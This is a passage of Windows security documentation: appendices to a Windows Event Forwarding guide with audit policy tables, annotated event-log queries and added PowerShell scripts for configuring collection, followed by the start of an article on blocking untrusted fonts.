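The collector-side settings discussed earlier (source-initiated push, the binary "Events" content format, Custom delivery, reading existing events, and a per-subscription ACL of machine accounts) come together in one subscription file. The following is an added example, the editor's script rather than the article's own subscription XML, that creates a Targeted subscription with those settings and a three-query subset of the suspect list above (network logon sessions, client DNS lookups, PowerShell script blocks). The group name, collector setup and event subset are assumptions.

```powershell
# Added example (editor's script, not from this article): create the Targeted (suspect)
# subscription on the WEC server. Assumptions: the Windows Event Collector service is
# configured on this server, the domain group CONTOSO\WEF-Targeted-Hosts holds the enrolled
# machine accounts, and the three queries below are a small subset of the Appendix F query.
# Run in an elevated PowerShell session on the collector.
$subscriptionName = 'Targeted'
$allowedGroup     = 'CONTOSO\WEF-Targeted-Hosts'

# The subscription ACL is SDDL over machine accounts, so resolve the group to its SID.
$groupSid = ([System.Security.Principal.NTAccount]$allowedGroup).Translate(
    [System.Security.Principal.SecurityIdentifier]).Value

# Query subset: network logon sessions (4624, logon type 3), DNS client lookups (3008)
# and PowerShell script blocks (4104). Each <Query> is independent and can be removed
# without affecting the others.
$query = @"
<QueryList>
  <Query Id="0" Path="Security">
    <Select Path="Security">*[System[EventID=4624] and EventData[Data[@Name='LogonType']='3']]</Select>
  </Query>
  <Query Id="1" Path="Microsoft-Windows-DNS-Client/Operational">
    <Select Path="Microsoft-Windows-DNS-Client/Operational">*[System[EventID=3008]]</Select>
  </Query>
  <Query Id="2" Path="Microsoft-Windows-PowerShell/Operational">
    <Select Path="Microsoft-Windows-PowerShell/Operational">*[System[EventID=4104]]</Select>
  </Query>
</QueryList>
"@

# Custom delivery: 1 item / 10 ms (the same values as the wecutil /dmi:1 /dmlt:10 commands
# earlier) and a 15-minute heartbeat so idle hosts still check in.
$subscriptionXml = @"
<Subscription xmlns="http://schemas.microsoft.com/2006/03/windows/events/subscription">
  <SubscriptionId>$subscriptionName</SubscriptionId>
  <SubscriptionType>SourceInitiated</SubscriptionType>
  <Description>Targeted WEF subscription for hosts under heightened scrutiny</Description>
  <Enabled>true</Enabled>
  <Uri>http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog</Uri>
  <ConfigurationMode>Custom</ConfigurationMode>
  <Delivery Mode="Push">
    <Batching>
      <MaxItems>1</MaxItems>
      <MaxLatencyTime>10</MaxLatencyTime>
    </Batching>
    <PushSettings>
      <Heartbeat Interval="900000"/>
    </PushSettings>
  </Delivery>
  <Query><![CDATA[$query]]></Query>
  <ReadExistingEvents>true</ReadExistingEvents>
  <TransportName>http</TransportName>
  <ContentFormat>Events</ContentFormat>
  <Locale Language="en-US"/>
  <LogFile>ForwardedEvents</LogFile>
  <AllowedSourceNonDomainComputers></AllowedSourceNonDomainComputers>
  <AllowedSourceDomainComputers>O:NSG:BAD:P(A;;GA;;;$groupSid)</AllowedSourceDomainComputers>
</Subscription>
"@

$xmlPath = Join-Path $env:TEMP "$subscriptionName.xml"
Set-Content -Path $xmlPath -Value $subscriptionXml -Encoding UTF8

wecutil cs $xmlPath                 # create the subscription from the file
wecutil gs $subscriptionName        # print the stored configuration back
wecutil gr $subscriptionName        # runtime status: connected sources and last heartbeats

# Enrol or remove a host by changing group membership, not the subscription; the client
# picks the change up at its next subscription refresh.
```

Keeping the Baseline subscription's ACL at the default (all domain computers) and restricting only the Targeted one in this way matches the enrollment model described above; the `wecutil gr` output is the quickest check that a newly enrolled host has actually connected and sent a heartbeat.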

Appendix A - Minimum recommended audit policy


If your organizational audit policy enables additional auditing to meet its needs, that is fine. The policy below is the
minimum audit policy settings needed to enable events collected by both baseline and targeted subscriptions.

Category | Subcategory | Audit settings
Account Logon | Credential Validation | Success and Failure
Account Management | Security Group Management | Success
Account Management | User Account Management | Success and Failure
Account Management | Computer Account Management | Success and Failure
Account Management | Other Account Management Events | Success and Failure
Detailed Tracking | Process Creation | Success
Detailed Tracking | Process Termination | Success
Logon/Logoff | User/Device Claims | Not configured
Logon/Logoff | IPsec Extended Mode | Not configured
Logon/Logoff | IPsec Quick Mode | Not configured
Logon/Logoff | Logon | Success and Failure
Logon/Logoff | Logoff | Success
Logon/Logoff | Other Logon/Logoff Events | Success and Failure
Logon/Logoff | Special Logon | Success and Failure
Logon/Logoff | Account Lockout | Success
Object Access | Application Generated | Not configured
Object Access | File Share | Success
Object Access | File System | Not configured
Object Access | Other Object Access Events | Not configured
Object Access | Registry | Not configured
Object Access | Removable Storage | Success
Policy Change | Audit Policy Change | Success and Failure
Policy Change | MPSSVC Rule-Level Policy Change | Success and Failure
Policy Change | Other Policy Change Events | Success and Failure
Policy Change | Authentication Policy Change | Success and Failure
Policy Change | Authorization Policy Change | Success and Failure
Privilege Use | Sensitive Privilege Use | Not configured
System | Security State Change | Success and Failure
System | Security System Extension | Success and Failure
System | System Integrity | Success and Failure
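The table above as an applied-and-verified policy, in an added PowerShell script that is not part of the original document; it uses auditpol's English subcategory names and only enables the flags the table requires, so any extra auditing your organization has already configured is left alone.

```powershell
# Added example (not from the original): apply the Appendix A minimum audit policy with
# auditpol and verify the result. Only the required Success/Failure flags are enabled, so
# extra auditing your organization already has is left alone, as the appendix allows.
# Run elevated. If an Advanced Audit Policy GPO applies to this host, it overrides these
# local settings at the next refresh, so put the same settings in that GPO instead.
$MinimumAuditPolicy = @(
    @{ Subcategory = 'Credential Validation';            Success = $true; Failure = $true  }
    @{ Subcategory = 'Security Group Management';        Success = $true; Failure = $false }
    @{ Subcategory = 'User Account Management';          Success = $true; Failure = $true  }
    @{ Subcategory = 'Computer Account Management';      Success = $true; Failure = $true  }
    @{ Subcategory = 'Other Account Management Events';  Success = $true; Failure = $true  }
    @{ Subcategory = 'Process Creation';                 Success = $true; Failure = $false }
    @{ Subcategory = 'Process Termination';              Success = $true; Failure = $false }
    @{ Subcategory = 'Logon';                            Success = $true; Failure = $true  }
    @{ Subcategory = 'Logoff';                           Success = $true; Failure = $false }
    @{ Subcategory = 'Other Logon/Logoff Events';        Success = $true; Failure = $true  }
    @{ Subcategory = 'Special Logon';                    Success = $true; Failure = $true  }
    @{ Subcategory = 'Account Lockout';                  Success = $true; Failure = $false }
    @{ Subcategory = 'File Share';                       Success = $true; Failure = $false }
    @{ Subcategory = 'Removable Storage';                Success = $true; Failure = $false }
    @{ Subcategory = 'Audit Policy Change';              Success = $true; Failure = $true  }
    @{ Subcategory = 'MPSSVC Rule-Level Policy Change';  Success = $true; Failure = $true  }
    @{ Subcategory = 'Other Policy Change Events';       Success = $true; Failure = $true  }
    @{ Subcategory = 'Authentication Policy Change';     Success = $true; Failure = $true  }
    @{ Subcategory = 'Authorization Policy Change';      Success = $true; Failure = $true  }
    @{ Subcategory = 'Security State Change';            Success = $true; Failure = $true  }
    @{ Subcategory = 'Security System Extension';        Success = $true; Failure = $true  }
    @{ Subcategory = 'System Integrity';                 Success = $true; Failure = $true  }
)

function Get-AuditSubcategorySetting {
    param([Parameter(Mandatory)][string]$Subcategory)
    # 'auditpol /get ... /r' prints CSV (after a blank line); the Inclusion Setting column is
    # one of "No Auditing", "Success", "Failure" or "Success and Failure".
    $row = auditpol /get /subcategory:"$Subcategory" /r |
        Where-Object { $_.Trim() } | ConvertFrom-Csv | Select-Object -First 1
    if (-not $row) { throw "auditpol returned nothing for '$Subcategory'" }
    return $row.'Inclusion Setting'
}

function Set-MinimumAuditPolicy {
    param([Parameter(Mandatory)][hashtable[]]$Policy)
    foreach ($p in $Policy) {
        # Build only the enable flags; never pass /success:disable or /failure:disable.
        $flags = @()
        if ($p.Success) { $flags += '/success:enable' }
        if ($p.Failure) { $flags += '/failure:enable' }
        auditpol /set /subcategory:"$($p.Subcategory)" $flags | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "auditpol /set failed for '$($p.Subcategory)'" }
    }
}

function Test-MinimumAuditPolicy {
    param([Parameter(Mandatory)][hashtable[]]$Policy)
    # Emits one object per subcategory that still falls short of the minimum.
    foreach ($p in $Policy) {
        $actual  = Get-AuditSubcategorySetting -Subcategory $p.Subcategory
        $missing = @()
        if ($p.Success -and $actual -notmatch 'Success') { $missing += 'Success' }
        if ($p.Failure -and $actual -notmatch 'Failure') { $missing += 'Failure' }
        if ($missing) {
            [pscustomobject]@{ Subcategory = $p.Subcategory; Actual = $actual; Missing = ($missing -join ', ') }
        }
    }
}

Set-MinimumAuditPolicy -Policy $MinimumAuditPolicy
$gaps = @(Test-MinimumAuditPolicy -Policy $MinimumAuditPolicy)
if ($gaps.Count -eq 0) { 'Minimum audit policy is in place.' } else { $gaps | Format-Table -AutoSize }
```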

Appendix B - Recommended minimum registry system ACL policy


The Run and RunOnce keys are useful for intruders and malware persistence. They allow code to be run (or run only once and then removed, respectively) when a user logs into the system.
This can easily be extended to other Auto-Execution Start Points keys in the registry.
Use the following figures to see how you can configure those registry keys.
Appendix C - Event channel settings (enable and channel access) methods
Some channels are disabled by default and have to be enabled. Others, such as Microsoft-Windows-
CAPI2/Operational must have the channel access modified to allow the Event Log Readers built-in security group
to read from it.
The recommended and most effective way to do this is to configure the baseline GPO to run a scheduled task to configure the event channels (enable, set maximum size, and adjust channel access). This will take effect at the next GPO refresh cycle and has minimal impact on the client device.
The following GPO snippet performs the following:
Enables the Microsoft-Windows-Capi2/Operational event channel.
Sets the maximum file size for Microsoft-Windows-Capi2/Operational to 100MB.
Sets the maximum file size for Microsoft-Windows-AppLocker/EXE and DLL to 100MB.
Sets the maximum channel access for Microsoft-Windows-Capi2/Operational to include the built-in Event
Log Readers security group.
Enables the Microsoft-Windows-DriverFrameworks-UserMode/Operational event channel.
Sets the maximum file size for Microsoft-Windows-DriverFrameworks-UserMode/Operational to 50MB.
Appendix D - Minimum GPO for WEF Client configuration
Here are the minimum steps for WEF to operate:
1. Configure the collector URI(s).
2. Start the WinRM service.
3. Add the Network Service account to the built-in Event Log Readers security group. This allows reading from secured event channels, such as the security event channel.
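Appendices C and D together, as an added PowerShell script that is not the original GPO snippet (which is a figure): it enables and sizes the three channels, grants the Event Log Readers group read access to CAPI2/Operational by amending the channel's existing ACL rather than replacing it, and applies the three WEF client steps; the collector URI is a placeholder.

```powershell
# Added example (not from the original GPO snippet, which is a figure): the Appendix C channel
# settings and the Appendix D WEF client minimum, as a script you can run from the scheduled
# task the baseline GPO creates. Run elevated. The collector URI is a placeholder.
$CollectorUri = 'Server=http://wec.example.invalid:5985/wsman/SubscriptionManager/WEC,Refresh=60'
$EventLogReadersSid = 'S-1-5-32-573'   # built-in Event Log Readers, language-neutral

function Get-ChannelAccessSddl {
    param([Parameter(Mandatory)][string]$Channel)
    # 'wevtutil gl' prints one "name: value" line per setting; we need channelAccess.
    foreach ($line in (wevtutil gl $Channel)) {
        if ($line -match '^\s*channelAccess:\s*(\S+)') { return $Matches[1] }
    }
    throw "wevtutil did not report channelAccess for '$Channel'"
}

function Set-EventChannel {
    param(
        [Parameter(Mandatory)][string]$Channel,
        [Parameter(Mandatory)][int]$MaxSizeMB,
        [switch]$GrantEventLogReaders
    )
    # Enable the channel and set its maximum size; wevtutil wants bytes.
    wevtutil sl $Channel /e:true /ms:$($MaxSizeMB * 1MB)
    if ($LASTEXITCODE -ne 0) { throw "wevtutil sl failed for '$Channel'" }
    if ($GrantEventLogReaders) {
        # Add a read ACE (0x1) for Event Log Readers to the existing DACL instead of replacing
        # the whole descriptor, so SYSTEM/Administrators access is untouched. Idempotent.
        $sddl = Get-ChannelAccessSddl -Channel $Channel
        $ace  = "(A;;0x1;;;$EventLogReadersSid)"
        if ($sddl -notlike "*$ace*") {
            # Insert after the last ACE of the D: section (keeps any trailing S: section intact).
            $newSddl = $sddl -replace '(D:[A-Z]*(?:\([^)]*\))*)', ('$1' + $ace)
            wevtutil sl $Channel /ca:$newSddl
            if ($LASTEXITCODE -ne 0) { throw "wevtutil sl /ca failed for '$Channel'" }
        }
    }
}

function Set-WefClientMinimum {
    param([Parameter(Mandatory)][string]$SubscriptionManager)
    # 1. Collector URI: the registry location behind the
    #    "Configure target Subscription Manager" policy setting.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name '1' -Value $SubscriptionManager -Type String
    # 2. WinRM carries the forwarder's traffic to the collector.
    Set-Service -Name WinRM -StartupType Automatic
    Start-Service -Name WinRM
    # 3. Network Service (S-1-5-20) must be able to read secured channels such as Security.
    $readers = Get-LocalGroup -SID $EventLogReadersSid
    $members = @(Get-LocalGroupMember -Group $readers -ErrorAction SilentlyContinue)
    if (-not ($members | Where-Object { $_.SID.Value -eq 'S-1-5-20' })) {
        Add-LocalGroupMember -Group $readers -Member 'S-1-5-20'
    }
}

Set-EventChannel -Channel 'Microsoft-Windows-CAPI2/Operational' -MaxSizeMB 100 -GrantEventLogReaders
Set-EventChannel -Channel 'Microsoft-Windows-AppLocker/EXE and DLL' -MaxSizeMB 100
Set-EventChannel -Channel 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' -MaxSizeMB 50
Set-WefClientMinimum -SubscriptionManager $CollectorUri
```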
Appendix E – Annotated baseline subscription event query
<QueryList>
<Query Id="0" Path="System">
<!-- Anti-malware *old* events, but only detect events (cuts down noise) -->
<Select Path="System">*[System[Provider[@Name='Microsoft Antimalware'] and (EventID &gt;= 1116 and EventID
&lt;= 1119)]]</Select>
</Query>
<!-- AppLocker EXE events or Script events -->
<Query Id="1" Path="Microsoft-Windows-AppLocker/EXE and DLL">
<Select Path="Microsoft-Windows-AppLocker/EXE and DLL">*[UserData[RuleAndFileData[PolicyName="EXE"]]]
</Select>
<Select Path="Microsoft-Windows-AppLocker/MSI and Script">*</Select>
</Query>
<Query Id="2" Path="Security">
<!-- Wireless Lan 802.1x authentication events with Peer MAC address -->
<Select Path="Security">*[System[(EventID=5632)]]</Select>
</Query>
<Query Id="3" Path="Microsoft-Windows-TaskScheduler/Operational">
<!-- Task scheduler Task Registered (106), Task Registration Deleted (141), Task Deleted (142) -->
<Select Path="Microsoft-Windows-TaskScheduler/Operational">*[System[Provider[@Name='Microsoft-Windows-TaskScheduler'] and (EventID=106 or EventID=141 or EventID=142 )]]</Select>
<Select Path="System">*[System[Provider[@Name='Microsoft-Windows-TaskScheduler'] and (EventID=106 or
EventID=141 or EventID=142 )]]</Select>
</Query>
<Query Id="4" Path="System">
<!-- System startup (12 - includes OS/SP/Version) and shutdown -->
<Select Path="System">*[System[Provider[@Name='Microsoft-Windows-Kernel-General'] and (EventID=12 or
EventID=13)]]</Select>
</Query>
<Query Id="5" Path="System">
<!-- Service Install (7000), service start failure (7045), new service (4697) -->
<Select Path="System">*[System[Provider[@Name='Service Control Manager'] and (EventID = 7000 or
EventID=7045)]]</Select>
<Select Path="Security">*[System[(EventID=4697)]]</Select>
</Query>
<Query Id="6" Path="Security">
<!-- TS Session reconnect (4778), TS Session disconnect (4779) -->
<Select Path="Security">*[System[(EventID=4778 or EventID=4779)]]</Select>
</Query>
<Query Id="7" Path="Security">
<!-- Network share object access without IPC$ and Netlogon shares -->
<Select Path="Security">*[System[(EventID=5140)]] and (*[EventData[Data[@Name="ShareName"]!="\\*\IPC$"]])
and (*[EventData[Data[@Name="ShareName"]!="\\*\NetLogon"]])</Select>
</Query>
<Query Id="8" Path="Security">
<!-- System Time Change (4616) -->
<Select Path="Security">*[System[(EventID=4616)]]</Select>
</Query>
<Query Id="9" Path="System">
<!-- Shutdown initiate requests, with user, process and reason (if supplied) -->
<Select Path="System">*[System[Provider[@Name='USER32'] and (EventID=1074)]]</Select>
</Query>
<!-- AppLocker packaged (Modern UI) app execution -->
<Query Id="10" Path="Microsoft-Windows-AppLocker/Packaged app-Execution">
<Select Path="Microsoft-Windows-AppLocker/Packaged app-Execution">*</Select>
</Query>
<!-- AppLocker packaged (Modern UI) app installation -->
<Query Id="11" Path="Microsoft-Windows-AppLocker/Packaged app-Deployment">
<Select Path="Microsoft-Windows-AppLocker/Packaged app-Deployment">*</Select>
</Query>
<Query Id="12" Path="Application">
<!-- EMET events -->
<Select Path="Application">*[System[Provider[@Name='EMET']]]</Select>
</Query>
<Query Id="13" Path="System">
<!-- Event log service events -->
<Select Path="System">*[System[Provider[@Name='Microsoft-Windows-Eventlog']]]</Select>
</Query>
<Query Id="14" Path="Security">
<!-- Local logons without network or service events -->
<Select Path="Security">*[System[(EventID=4624)]] and (*[EventData[Data[@Name="LogonType"]!="3"]]) and (*
[EventData[Data[@Name="LogonType"]!="5"]])</Select>
</Query>
<Query Id="15" Path="Application">
<!-- WER events for application crashes only -->
<Select Path="Application">*[System[Provider[@Name='Windows Error Reporting']]] and (*[EventData[Data[3]
="APPCRASH"]])</Select>
</Query>
<Query Id="16" Path="Security">
<!-- Security Log cleared events (1102), EventLog Service shutdown (1100)-->
<Select Path="Security">*[System[(EventID=1102 or EventID = 1100)]]</Select>
</Query>
<Query Id="17" Path="System">
<!-- Other Log cleared events (104)-->
<Select Path="System">*[System[(EventID=104)]]</Select>
</Query>
<Query Id="18" Path="Security">
<!-- user initiated logoff -->
<Select Path="Security">*[System[(EventID=4647)]]</Select>
</Query>
<Query Id="19" Path="Security">
<!-- user logoff for all non-network logon sessions-->
<Select Path="Security">*[System[(EventID=4634)]] and (*[EventData[Data[@Name="LogonType"] != "3"]])
</Select>
</Query>
<Query Id="20" Path="Security">
<!-- Service logon events if the user account isn't LocalSystem, NetworkService, LocalService -->
<Select Path="Security">*[System[(EventID=4624)]] and (*[EventData[Data[@Name="LogonType"]="5"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-18"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-19"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-20"]])</Select>
</Query>
<Query Id="21" Path="Security">
<!-- Network Share create (5142), Network Share Delete (5144) -->
<Select Path="Security">*[System[(EventID=5142 or EventID=5144)]]</Select>
</Query>
<Query Id="22" Path="Security">
<!-- Process Create (4688) -->
<Select Path="Security">*[System[EventID=4688]]</Select>
</Query>
<Query Id="23" Path="Security">
<!-- Event log service events specific to Security channel -->
<Select Path="Security">*[System[Provider[@Name='Microsoft-Windows-Eventlog']]]</Select>
</Query>
<Query Id="26" Path="Security">
<!-- Special Privileges (Admin-equivalent Access) assigned to new logon, excluding LocalSystem-->
<Select Path="Security">*[System[(EventID=4672)]]</Select>
<Suppress Path="Security">*[EventData[Data[1]="S-1-5-18"]]</Suppress>
</Query>
<Query Id="27" Path="Security">
<!-- New user added to local security group-->
<Select Path="Security">*[System[(EventID=4732)]]</Select>
</Query>
<Query Id="28" Path="Security">
<!-- New user added to global security group-->
<Select Path="Security">*[System[(EventID=4728)]]</Select>
</Query>
<Query Id="29" Path="Security">
<!-- New user added to universal security group-->
<Select Path="Security">*[System[(EventID=4756)]]</Select>
</Query>
<Query Id="30" Path="Security">
<!-- User removed from local Administrators group-->
<Select Path="Security">*[System[(EventID=4733)]] and (*
[EventData[Data[@Name="TargetUserName"]="Administrators"]])</Select>
</Query>
<Query Id="31" Path="Microsoft-Windows-TerminalServices-RDPClient/Operational">
<!-- Log attempted TS connect to remote server -->
<Select Path="Microsoft-Windows-TerminalServices-RDPClient/Operational">*[System[(EventID=1024)]]</Select>
</Query>
<Query Id="32" Path="Security">
<!-- Certificate Services received certificate request (4886), Approved and Certificate issued (4887),
Denied request (4888) -->
<Select Path="Security">*[System[(EventID=4886 or EventID=4887 or EventID=4888)]]</Select>
</Query>
<Query Id="34" Path="Security">
<!-- New User Account Created(4720), User Account Enabled (4722), User Account Disabled (4725), User
Account Deleted (4726) -->
<Select Path="Security">*[System[(EventID=4720 or EventID=4722 or EventID=4725 or EventID=4726)]]</Select>
</Query>
<Query Id="35" Path="Microsoft-Windows-SmartCard-Audit/Authentication">
<!-- Gets all Smart-card Card-Holder Verification (CHV) events (success and failure) performed on the host.
-->
<Select Path="Microsoft-Windows-SmartCard-Audit/Authentication">*</Select>
</Query>
<Query Id="36" Path="Microsoft-Windows-SMBClient/Operational">
<!-- get all UNC/mapped drive successful connection -->
<Select Path="Microsoft-Windows-SMBClient/Operational">*[System[(EventID=30622 or EventID=30624)]]</Select>
</Query>
<Query Id="37" Path="Application">
<!-- User logging on with Temporary profile (1511), cannot create profile, using temporary profile (1518) -->
<Select Path="Application">*[System[Provider[@Name='Microsoft-Windows-User Profiles Service'] and
(EventID=1511 or EventID=1518)]]</Select>
</Query>
<Query Id="39" Path="Microsoft-Windows-Sysmon/Operational">
<!-- Modern SysMon event provider-->
<Select Path="Microsoft-Windows-Sysmon/Operational">*</Select>
</Query>
<Query Id="40" Path="Application">
<!-- Application crash/hang events, similar to WER/1001. These include full path to faulting EXE/Module.-->
<Select Path="Application">*[System[Provider[@Name='Application Error'] and (EventID=1000)]]</Select>
<Select Path="Application">*[System[Provider[@Name='Application Hang'] and (EventID=1002)]]</Select>
</Query>
<Query Id="41" Path="Microsoft-Windows-Windows Defender/Operational">
<!-- Modern Windows Defender event provider Detection events (1006-1009) and (1116-1119) -->
<Select Path="Microsoft-Windows-Windows Defender/Operational">*[System[( (EventID &gt;= 1006 and EventID
&lt;= 1009) )]]</Select>
<Select Path="Microsoft-Windows-Windows Defender/Operational">*[System[( (EventID &gt;= 1116 and EventID
&lt;= 1119) )]]</Select>
</Query>
</QueryList>

Appendix F – Annotated Suspect Subscription Event Query


<QueryList>
<Query Id="0" Path="Security">
<!-- Network logon events-->
<Select Path="Security">*[System[(EventID=4624)]] and (*[EventData[Data[@Name="LogonType"]="3"]])</Select>
</Query>
<Query Id="1" Path="System">
<!-- RADIUS authentication events User Assigned IP address (20274), User successfully authenticated
(20250), User Disconnected (20275) -->
<Select Path="System">*[System[Provider[@Name='RemoteAccess'] and (EventID=20274 or EventID=20250 or
EventID=20275)]]</Select>
</Query>
<Query Id="2" Path="Microsoft-Windows-CAPI2/Operational">
<!-- CAPI events Build Chain (11), Private Key accessed (70), X509 object (90)-->
<Select Path="Microsoft-Windows-CAPI2/Operational">*[System[(EventID=11 or EventID=70 or EventID=90)]]
</Select>
</Query>
<Query Id="3" Path="Security">
<!-- CA stop/Start events CA Service Stopped (4880), CA Service Started (4881), CA DB row(s) deleted
(4896), CA Template loaded (4898) -->
<Select Path="Security">*[System[(EventID=4880 or EventID = 4881 or EventID = 4896 or EventID = 4898)]]
</Select>
</Query>
<Query Id="4" Path="Microsoft-Windows-LSA/Operational">
<!-- Groups assigned to new login (except for well known, built-in accounts)-->
<Select Path="Microsoft-Windows-LSA/Operational">*[System[(EventID=300)]] and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-20"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-18"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-19"]])</Select>
</Query>
<Query Id="5" Path="Security">
<!-- Logoff events - for Network Logon events-->
<Select Path="Security">*[System[(EventID=4634)]] and (*[EventData[Data[@Name="LogonType"] = "3"]])
</Select>
</Query>
<Query Id="6" Path="Security">
<!-- RRAS events – only generated on Microsoft IAS server -->
<Select Path="Security">*[System[( (EventID &gt;= 6272 and EventID &lt;= 6280) )]]</Select>
</Query>
<Query Id="7" Path="Microsoft-Windows-DNS-Client/Operational">
<!-- DNS Client events Query Completed (3008) -->
<Select Path="Microsoft-Windows-DNS-Client/Operational">*[System[(EventID=3008)]]</Select>
<!-- suppresses local machine name resolution events -->
<Suppress Path="Microsoft-Windows-DNS-Client/Operational">*
[EventData[Data[@Name="QueryOptions"]="140737488355328"]]</Suppress>
<!-- suppresses empty name resolution events -->
<Suppress Path="Microsoft-Windows-DNS-Client/Operational">*[EventData[Data[@Name="QueryResults"]=""]]
</Suppress>
</Query>
<Query Id="8" Path="Security">
<!-- Process Terminate (4689) -->
<Select Path="Security">*[System[(EventID = 4689)]]</Select>
</Query>
<Query Id="9" Path="Security">
<!-- Local credential authentication events (4776), Logon with explicit credentials (4648) -->
<Select Path="Security">*[System[(EventID=4776 or EventID=4648)]]</Select>
</Query>
<Query Id="10" Path="Security">
<!-- Registry modified events for Operations: New Registry Value created (%%1904), Existing Registry Value
modified (%%1905), Registry Value Deleted (%%1906) -->
<Select Path="Security">*[System[(EventID=4657)]] and ((*[EventData[Data[@Name="OperationType"] =
"%%1904"]]) or (*[EventData[Data[@Name="OperationType"] = "%%1905"]]) or (*
[EventData[Data[@Name="OperationType"] = "%%1906"]]))</Select>
</Query>
<Query Id="11" Path="Security">
<!-- Request made to authenticate to Wireless network (including Peer MAC (5632) -->
<Select Path="Security">*[System[(EventID=5632)]]</Select>
</Query>
<Query Id="12" Path="Microsoft-Windows-PowerShell/Operational">
<!-- PowerShell execute block activity (4103), Remote Command(4104), Start Command(4105), Stop
Command(4106) -->
<Select Path="Microsoft-Windows-PowerShell/Operational">*[System[(EventID=4103 or EventID=4104 or
EventID=4105 or EventID=4106)]]</Select>
</Query>
<Query Id="13" Path="Microsoft-Windows-DriverFrameworks-UserMode/Operational">
<!-- Detect User-Mode drivers loaded - for potential BadUSB detection. -->
<Select Path="Microsoft-Windows-DriverFrameworks-UserMode/Operational">*[System[(EventID=2004)]]</Select>
</Query>
<Query Id="14" Path="Windows PowerShell">
<!-- Legacy PowerShell pipeline execution details (800) -->
<Select Path="Windows PowerShell">*[System[(EventID=800)]]</Select>
</Query>
</QueryList>
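A way to dry-run a subscription query like the ones in Appendices E and F on a single host before it goes to the collector, as an added PowerShell example that is not part of the original document; the embedded QueryList is a two-query excerpt in the style of those appendices, and the checks (well-formed XML, unique Query Ids, channels present) are this example's own.

```powershell
# Added example (not from the original): dry-run a subscription query on the local host before
# deploying it to the collector. It rejects malformed XML (for example an extra </Query>),
# duplicate Query Ids, and channels that do not exist here, then evaluates the same
# Select/Suppress XPath with Get-WinEvent. The QueryList below is a two-query excerpt in the
# style of Appendices E and F. Run elevated to read the Security channel.
$QueryXml = @'
<QueryList>
  <Query Id="0" Path="Security">
    <!-- Service logons (type 5) not running as LocalSystem, LocalService or NetworkService -->
    <Select Path="Security">*[System[(EventID=4624)]] and (*[EventData[Data[@Name="LogonType"]="5"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-18"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-19"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-20"]])</Select>
  </Query>
  <Query Id="1" Path="Microsoft-Windows-DNS-Client/Operational">
    <!-- DNS Query Completed (3008), minus local-name and empty-result noise -->
    <Select Path="Microsoft-Windows-DNS-Client/Operational">*[System[(EventID=3008)]]</Select>
    <Suppress Path="Microsoft-Windows-DNS-Client/Operational">*[EventData[Data[@Name="QueryOptions"]="140737488355328"]]</Suppress>
    <Suppress Path="Microsoft-Windows-DNS-Client/Operational">*[EventData[Data[@Name="QueryResults"]=""]]</Suppress>
  </Query>
</QueryList>
'@

function Test-SubscriptionQuery {
    param(
        [Parameter(Mandatory)][string]$Xml,
        [int]$MaxEvents = 25
    )
    # 1. Well-formedness: an unbalanced tag or unterminated comment fails here, not on the collector.
    try { $doc = [xml]$Xml } catch { throw "Query XML is not well-formed: $($_.Exception.Message)" }

    # 2. Query Ids must be unique within a QueryList.
    $ids  = @($doc.QueryList.Query | ForEach-Object { $_.Id })
    $dups = @($ids | Group-Object | Where-Object { $_.Count -gt 1 } | ForEach-Object { $_.Name })
    if ($dups.Count) { throw "Duplicate Query Id(s): $($dups -join ', ')" }

    # 3. Every channel named in a Select/Suppress must exist locally, or it silently matches nothing.
    $paths = $doc.SelectNodes('//Select/@Path | //Suppress/@Path') | ForEach-Object { $_.Value } | Sort-Object -Unique
    foreach ($p in $paths) {
        if (-not (Get-WinEvent -ListLog $p -ErrorAction SilentlyContinue)) {
            Write-Warning "Channel not present on this host: $p"
        }
    }

    # 4. Evaluate the XPath exactly as the collector will, and show what matched per channel/ID.
    $events = @(Get-WinEvent -FilterXml $doc -MaxEvents $MaxEvents -ErrorAction SilentlyContinue)
    if ($events.Count -eq 0) { Write-Warning 'Query parsed but matched no events here.'; return }
    $events | Group-Object LogName, Id | Select-Object Count, Name | Sort-Object Count -Descending
}

Test-SubscriptionQuery -Xml $QueryXml
```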

Appendix G - Online resources


You can get more info with the following links:
Event Selection
Event Queries and Event XML
Event Query Schema
Windows Event Collector
Block untrusted fonts in an enterprise
3/19/2019 • 5 minutes to read

Applies to:
Windows 10

Learn more about what features and functionality are supported in each Windows edition at Compare
Windows 10 Editions.

To help protect your company from attacks that may originate from untrusted or attacker-controlled font files, we’ve created the Blocking Untrusted Fonts feature. Using this feature, you can turn on a global setting that stops your employees from loading untrusted fonts processed using the Graphics Device Interface (GDI) onto your network. Untrusted fonts are any font installed outside of the %windir%/Fonts directory. Blocking untrusted fonts helps prevent both remote (web-based or email-based) and local elevation-of-privilege (EOP) attacks that can happen during the font file-parsing process.

What does this mean for me?


Blocking untrusted fonts helps improve your network and employee protection against font-processing-related
attacks. By default, this feature is not turned on.

How does this feature work?


There are 3 ways to use this feature:
On. Helps stop any font processed using GDI from loading outside of the %windir%/Fonts directory. It also
turns on event logging.
Audit. Turns on event logging, but doesn’t block fonts from loading, regardless of location. The name of the
apps that use untrusted fonts appear in your event log.
Note
If you aren’t quite ready to deploy this feature into your organization, you can run it in Audit mode to see if
not loading untrusted fonts causes any usability or compatibility issues.
Exclude apps to load untrusted fonts. You can exclude specific apps, allowing them to load untrusted
fonts, even while this feature is turned on. For instructions, see Fix apps having problems because of blocked
fonts.

Potential reductions in functionality


After you turn this feature on, your employees might experience reduced functionality when:
Sending a print job to a remote printer server that uses this feature and where the spooler process hasn’t
been specifically excluded. In this situation, any fonts that aren’t already available in the server’s
%windir%/Fonts folder won’t be used.
Printing using fonts provided by the installed printer’s graphics .dll file, outside of the %windir%/Fonts
